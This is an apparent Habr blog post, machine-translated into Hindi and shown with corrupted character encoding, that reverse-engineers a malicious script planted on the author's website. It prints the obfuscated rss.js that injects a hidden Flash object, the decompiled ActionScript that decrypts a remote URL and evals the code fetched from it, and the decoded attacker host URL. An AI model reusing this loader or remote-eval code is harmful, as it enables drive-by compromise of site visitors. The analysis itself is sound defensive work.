Geekly Articles each Day

рд╕рд╛рдЗрдЯ рдпрд╛ рд░рд┐рд╡рд░реНрд╕ рдЗрдВрдЬреАрдирд┐рдпрд░рд┐рдВрдЧ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯред WF.254 рдкрд░ рд╡рд╛рдпрд░рд╕

рдпрд╣ рд╕рдм рдЗрд╕ рддрдереНрдп рд╕реЗ рд╢реБрд░реВ рд╣реБрдЖ рдХрд┐ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдиреЗ рдореЗрд░реЗ рдХрд╛рдо рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рд▓реИрдкрдЯреЙрдк (рд╡рд┐рди рдПрдХреНрд╕рдкреА) рдкрд░ рдПрдХ рдирдпрд╛ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ред рдПрдХ рдЕрдЪреНрдЫрд╛ рджрд┐рди, рдЬрдм рдореИрдВ рдЕрдкрдиреА рдПрдХ рд╕рд╛рдЗрдЯ рдкрд░ рдЧрдпрд╛, рддреЛ рдореБрдЭреЗ рдпрд╣ рдЕрдкреНрд░рд┐рдп рдЪрд┐рддреНрд░ рдорд┐рд▓рд╛:



рдЕрджреНрдпрддрди: Dr.Web рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЕрднреА рднреА рдпрд╣рд╛рдБ рд╕рд╛рдЗрдЯ рдкрд░ рд╣реИ

рдмреЗрд╢рдХ, рдкрд╣рд▓реА рдЪреАрдЬ рдЬреЛ рдореИрдВ рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рдерд╛ рд╡рд╣ рдЗрд╕реЗ рд╣рдЯрд╛ рджрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рдЗрд╕рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ рдмрд╕ рдПрдлрд╝рдЯреАрдкреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛рдирд╛ рдерд╛ рдФрд░ rss.js рдлрд╝рд╛рдЗрд▓ рдХреЛ рдирд╛рдЦреВрди рдХрд░рдирд╛ рдерд╛ред рд▓реЗрдХрд┐рди рдлрд┐рд░ рдЕрдЪрд╛рдирдХ рдпрд╣ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдореИрдВ рдПрдлрд╝рдЯреАрдкреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рд╛рдЗрдЯ рддрдХ рдирд╣реАрдВ рдкрд╣реБрдВрдЪ рд╕рдХрддрд╛, рдХреНрдпреЛрдВрдХрд┐ рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рдФрд░ рдбреЛрдореЗрди рдореЗрд░рд╛ рдирд╣реАрдВ рд╣реИ, рдФрд░ рдЬрд╛рд╣рд┐рд░ рд╣реИ рдХрд┐ рдкреНрд░рд╡реЗрд╢рдХрд░реНрддрд╛рдУрдВ рдиреЗ рд╣рд╛рд▓ рд╣реА рдореЗрдВ рдЕрдкрдирд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓ рджрд┐рдпрд╛ рд╣реИред рдорд╛рд▓рд┐рдХреЛрдВ рдиреЗ рдЗрд╕реЗ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдмрдВрдзрди рдирд╣реАрдВ рдХрд┐рдпрд╛, рд▓реЗрдХрд┐рди рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рд╡рд╛рдпрд░рд╕ рдХреНрдпрд╛ рдХрд░ рд░рд╣рд╛ рдерд╛, рдмрд╣реБрдд рдЙрддреНрд╕реБрдХ рдерд╛ ...



рдЗрд╕рд▓рд┐рдП, рдореИрдВрдиреЗ рдПрдХ рдХрд╛рдо рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рд▓реИрдкрдЯреЙрдк рдкрд░ рдРрд╕рд╛ рдХрд░рдиреЗ рдХреА рд╣рд┐рдореНрдордд рдирд╣реАрдВ рдХреА, рдореИрдВрдиреЗ рдШрд░ рдкрд░ рдРрд╕рд╛ рдХрд░рдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛, рдХреНрдпреЛрдВрдХрд┐ рдореЗрд░реЗ рдШрд░ рдХреЗ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдореБрдЭреЗ рдбрд░ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рдХреБрдЫ рднреА рдирд╣реАрдВ рдерд╛ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдЪрд┐рд▓реНрд▓рд╛ рд░рд╣рд╛ рдерд╛ рдФрд░ рдХрд╛рдо рдореЗрдВ рд╣рд╕реНрддрдХреНрд╖реЗрдк рдирд╣реАрдВ рдХрд┐рдпрд╛ред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдореИрдВрдиреЗ рджреЗрдЦрд╛ рдХрд┐ rss.js рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИред

function addNewObject () { try { var ua = navigator.userAgent.toLowerCase(); if ((ua.indexOf("chrome") == -1 && ua.indexOf("win") != -1) && navigator.javaEnabled()) { var jtFRvRDNg=["subs\x74\x72","F\x55\x64\x59z\x73\x4dVX\x65XZ\x70\x6e\x6e\x79a.\x73wf\x66\x50Myo\x56\x6cV\x76\x43\x52q\x59oeF\x61","\x6aH\x4c/0\x38\x2d\x6bo\x68a\x77POT\x55\x4aGp","\x6f\x73F\x4e\x74x\x2f\x6dp\x33\x2fv\x69di\x72\x76\x61ni"];var counter = jtFRvRDNg[35-32][jtFRvRDNg[0]](-60+95-29,70+22-91+13) + jtFRvRDNg[2][jtFRvRDNg[0]](94-75-16,36+83-111) + jtFRvRDNg[17-16][jtFRvRDNg[0]](66+2+81-135,51-44); var div = document.createElement('div'); div.innerHTML = '<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">'; div.innerHTML += '<param name="allowScriptAccess" value="always" \/>'; div.innerHTML += '<param name="movie" value="'+ counter +'" \/>'; div.innerHTML += '<embed id="dummy2" name="dummy2" src="'+ counter +'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>'; div.innerHTML += '<\/object>'; div.style.position = 'absolute'; div.style.left = '-100px'; div.style.top = '-100px'; document.body.insertBefore(div, document.body.children[0]); } } catch (e) { if (document.body == undefined || document.body.children[0] == undefined) { setTimeout('addNewObject()', 50); } } } addNewObject();


рдХреЛрдб рд╕реЗ рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реИ рдХрд┐ рд╕реНрдХреНрд░рд┐рдкреНрдЯ swf рдмрдирд╛рддрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ рдкреЗрдЬ рдХреЛрдб рдореЗрдВ рдПрдореНрдмреЗрдб рдХрд░рддрд╛ рд╣реИ, рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдпрд╣ рдХрд╣рд╛рдВ рд╕реЗ swf рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ рд╣рдо рдХреЛрдб рдХреЗ рдЗрд╕ рдЕрдЬреАрдм рдЯреБрдХрдбрд╝реЗ рдХрд╛ рдбреА-рдСрдмрд╕реНрдкреИрдХреНрд╢рди рдХрд░рддреЗ рд╣реИрдВ:

 var jtFRvRDNg=["subs\x74\x72","F\x55\x64\x59z\x73\x4dVX\x65XZ\x70\x6e\x6e\x79a.\x73wf\x66\x50Myo\x56\x6cV\x76\x43\x52q\x59oeF\x61","\x6aH\x4c/0\x38\x2d\x6bo\x68a\x77POT\x55\x4aGp","\x6f\x73F\x4e\x74x\x2f\x6dp\x33\x2fv\x69di\x72\x76\x61ni"];var counter = jtFRvRDNg[35-32][jtFRvRDNg[0]](-60+95-29,70+22-91+13) + jtFRvRDNg[2][jtFRvRDNg[0]](94-75-16,36+83-111) + jtFRvRDNg[17-16][jtFRvRDNg[0]](66+2+81-135,51-44);


рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдпрд╣ рд╕рд░рд▓ рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рдПрдВ рдФрд░ рдЪрд▓рд╛рдПрдВ

 <!DOCTYPE html> <html> <head> <title></title> </head> <body> <script type="text/javascript"> var jtFRvRDNg = ["subs\x74\x72", "F\x55\x64\x59z\x73\x4dVX\x65XZ\x70\x6e\x6e\x79a.\x73wf\x66\x50Myo\x56\x6cV\x76\x43\x52q\x59oeF\x61", "\x6aH\x4c/0\x38\x2d\x6bo\x68a\x77POT\x55\x4aGp", "\x6f\x73F\x4e\x74x\x2f\x6dp\x33\x2fv\x69di\x72\x76\x61ni"]; var counter = jtFRvRDNg[35 - 32][jtFRvRDNg[0]](-60 + 95 - 29, 70 + 22 - 91 + 13) + jtFRvRDNg[2][jtFRvRDNg[0]](94 - 75 - 16, 36 + 83 - 111) + jtFRvRDNg[17 - 16][jtFRvRDNg[0]](66 + 2 + 81 - 135, 51 - 44); alert(counter); </script> </body> </html>


рдФрд░ рддреБрд░рдВрдд рджреЗрдЦреЗрдВ рдХрд┐ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг swf рдХрд╣рд╛рдБ рд▓реЛрдб рд╣реИ



рдЕрджреНрдпрддрди: рдХрдбрд╝реА рдХрдбрд╝реА

рдЕрдм рд╕рдмрд╕реЗ рдЖрд╕рд╛рди рдХрд╛рдо рдмрдЪрд╛ рд╣реИ, рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдпрд╣ рдлреНрд▓реИрд╢ рдореВрд╡реА рдХреНрдпрд╛ рдХрд░рддреА рд╣реИ, рдереЛрдбрд╝реА рд╕реА рдЧреВрдЧрд▓ рдиреЗ рдХрдИ swf рдбрд┐рдХрдВрдкрд╛рдЗрд▓рд░реНрд╕ рдкрд╛рдП, рд▓реЗрдХрд┐рди рдпрд╣ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдлрд╛рдЗрд▓ рдбрд┐рдХрдореНрдкреЛрдЬрд┐рд╢рди рд╕реЗ рд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИ



рдЕрджреНрдпрддрди: рдпрд╣ рд╡рд╣ рдЬрдЧрд╣ рд╣реИ рдЬрд╣рд╛рдБ рдЕрдкрдШрдЯрди рд╕реЗ swf "рд╕рдВрд░рдХреНрд╖рд┐рдд" рдерд╛

рдФрд░ рдЖрдк рд╕рдордЭ рдирд╣реАрдВ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдирдЧреНрди рдЖрдВрдЦреЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг ActionScript рдХреНрдпрд╛ рд╣реИ:

рд▓рдВрдмрд╛ рдЕрд╕рдВрдЧрдд рдХреЛрдб
 // 0 // Action tag #0 for (;;) { if (1847114876 == 1847115088) { false; 1238734783 & -1238734784; function decrypt(hex) { var __reg5; var __local0; if (205673138 ^ 205673138) { __local0 = __reg5 = "A"; } else { __reg5 = "A"; var __reg1; __local0 = __reg1 = 0; } __local0; for (;;) { 408838581 ^ 408838581; 2136550932 & -2136550933; if (__reg1 >= hex.B) { break; } if (1890669217 ^ 1890669217) { "C"; } else { var __reg3; if (!(1502222836 ^ 1502222836)) { __reg3 = hex.C(__reg1, 2); } } 1234629013 ^ 1234629013; 127070979 & -127070980; var __reg2 = int("D" + __reg3); 1130412752 ^ 1130412752; __reg2 = __reg2 ^ 5; 1618839222 & -1618839223; if (!(1876906722 ^ 1876906722)) { __reg5 = __reg5 + chr(__reg2); } var __local1; var __local2; if (1459356484 ^ 1459356484) { __local1 = __reg1; __local2 = 2; } else { __reg1 = __reg1 + 2; __local1 = 1035411512; __local2 = -1035411513; } __local1 & __local2; } return __reg5; } function checkFileLoaded() { }; 1791047020 & -1791047021; var = ""; 1234090841 ^ 1234090841; 353477196 ^ 353477196; if (!(1023518590 ^ 1023518590)) { ("E", ()); } 1053853491 & -1053853492; 657257249 & -657257250; var = (, 200); 503511606 ^ 503511606; 694364267 ^ 694364267; 2090915988 & -2090915989; loadVariables(G(), E); if (736039747 != 736040114) { continue; } } }



рдПрдХ рдЫреЛрдЯрд╛ рд╕рд╛ рдЧреЛрдЧреНрд▓рд┐рдВрдЧ, рдЬрд┐рд╕рдореЗрдВ рдореБрдЭреЗ рд╕реНрд╡рдирд┐рд░реНрдорд┐рдд рдбрд┐рдХрдореНрдкрд╛рдЗрд▓рд░ рдХреЗ рд╕рд╛рде рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд рдбреЛрдмреНрдпреВрд╢рди рдлрд╝рдВрдХреНрд╢рди рдорд┐рд▓рд╛, рдФрд░ рдпрд╣ рдХреЛрдб рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдмрд╣реБрдд рдЕрдзрд┐рдХ рдкрдардиреАрдп рд╣реИ:

 function decrypt(hex) { var _loc5_ = ""; var _loc1_ = 0; while(_loc1_ < hex.length) { var _loc3_ = hex.substr(_loc1_,2); var _loc2_ = int("0x" + _loc3_); _loc2_ = _loc2_ ^ 5; _loc5_ = _loc5_ + chr(_loc2_); _loc1_ = _loc1_ + 2; } return _loc5_; } function checkFileLoaded() { if(container.data != undefined) { var _loc1_ = container.data; _loc1_ = decrypt(_loc1_); flash.external.ExternalInterface.call("eval",_loc1_); clearInterval(loadingInterval); } } var url = "6d7171753f2a2a7d64717c71642b75752b70642a666a706b7160772a6d6c712a66696c606b715a6160306163353334663c3c353333613d37666366313632633767353c3c313030"; this.createEmptyMovieClip("container",this.getNextHighestDepth()); var loadingInterval = setInterval(checkFileLoaded,200); loadVariables(decrypt(url),container);


рдЕрджреНрдпрддрди: deobfuscator рдХреЗ рд╕рд╛рде SWF рдбрд┐рдХрдВрдкрд╛рдЗрд▓рд░

рдпрд╣ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЕрдзрд┐рдХ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ, рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдПрдХ url рд╣реИ, рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рдкрд┐рдВрдЧ рдЬрд╛рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ "рд╕рдВрд░рдХреНрд╖рд┐рдд" swf рдореЗрдВ url рдПрдиреНрдХреЛрдбреЗрдб рд╣реИ, рджреЛрд╕реНрддреЛрдВ рдиреЗ рдмрд╣реБрдд рдХреЛрд╢рд┐рд╢ рдХреАред рдореЗрд░реЗ рдкрд╛рд╕ рд╣рд╛рде рдкрд░ рдлреНрд▓реИрд╢ рд╕рдВрдкрд╛рджрдХ рдирд╣реАрдВ рд╣реИ, рдореБрдЭреЗ рдПрдХ рдПрдХреНрд╢рди рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдСрдирд▓рд╛рдЗрди рдХрдВрдкрд╛рдЗрд▓рд░ рдорд┐рд▓рд╛, рдПрдХ рдХреЛрдб рдХрд╛ рдПрдХ рдЯреБрдХрдбрд╝рд╛ рдХреЙрдкреА рдХрд┐рдпрд╛ рдЬреЛ рдПрдХ рдЙрдЬреНрдЬреНрд╡рд▓ рдпреВрдЖрд░рдПрд▓ рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ рдФрд░ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ:

 class Test { function decrypt(hex) { var _loc5_ = ""; var _loc1_ = 0; while(_loc1_ < hex.length) { var _loc3_ = hex.substr(_loc1_,2); var _loc2_ = int("0x" + _loc3_); _loc2_ = _loc2_ ^ 5; _loc5_ = _loc5_ + chr(_loc2_); _loc1_ = _loc1_ + 2; } return _loc5_; } public function Test(mc) { var url = "6d7171753f2a2a7d64717c71642b75752b70642a666a706b7160772a6d6c712a66696c606b715a6160306163353334663c3c353333613d37666366313632633767353c3c313030"; trace(decrypt(url)); } public static function main(mc:MovieClip) { var test = new Test(mc); } }


рдЕрдкрдбреЗрдЯ: рдпрд╣рд╛рдВ рдЖрдк рд╕реАрдзреЗ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдПрдХреНрд╢рдирд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ

рдЕрджреНрдпрддрди: рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк, рд╣рдореЗрдВ рдпреВрдЖрд░рдПрд▓ рдорд┐рд▓рддрд╛ рд╣реИ:
  http://xatyta.pp.ua/counter/hit/client_de5df061c99066d82cfc437f2b099455


рдЗрд╕ рдХрд╛рд░рдирд╛рдореЗ рдХрд╛ рдЕрд░реНрде рдореЗрд░реЗ рд▓рд┐рдП рдПрдХ рд░рд╣рд╕реНрдп рдмрдирд╛ рд░рд╣рд╛, рдХреЛрдИ рд╡реНрдпрдХреНрддрд┐ рдХреЗрд╡рд▓ рд╕рд╛рдЗрдЯ рд╡рд┐рдЬрд╝рд┐рдЯ рдкрд░ рдЖрдВрдХрдбрд╝реЗ рдПрдХрддреНрд░ рдХрд░рддрд╛ рд╣реИ? рдФрд░ рд╣реЗрдмрд░ рдХреЛ рдХреНрдпрд╛ рд▓рдЧрддрд╛ рд╣реИ, рдореИрдВ рдЯрд┐рдкреНрдкрдгрд┐рдпреЛрдВ рдХрд╛ рдЗрдВрддрдЬрд╛рд░ рдХрд░ рд░рд╣рд╛ рд╣реВрдВ, рд╣реЛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдХреЛрдИ рдПрдХ рд╕рдорд╛рди рд╣реЛ?

PS рдиреЗ рдЬрд╛рдирдмреВрдЭрдХрд░ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕, рдбрд┐рдХрдореНрдкреНрд░реЗрд╕рд░, рдСрдирд▓рд╛рдЗрди рд╕реЗрд╡рд╛рдУрдВ рдФрд░ рдЕрдиреНрдп рд▓рд┐рдВрдХ рдХреЗ рд▓рд┐рдВрдХ рдирд╣реАрдВ рджрд┐рдП

рдЕрджреНрдпрддрди: рдПрдХ рд╕рд░реНрд╡реЗрдХреНрд╖рдг рдореЗрдВ рдЬреЛрдбрд╝рд╛ рдЧрдпрд╛

рдЕрджреНрдпрддрди 2: рд▓рд┐рдВрдХ рдЬреЛрдбрд╝рд╛ рдЧрдпрд╛

Source: https://habr.com/ru/post/In196882/

More articles:


All Articles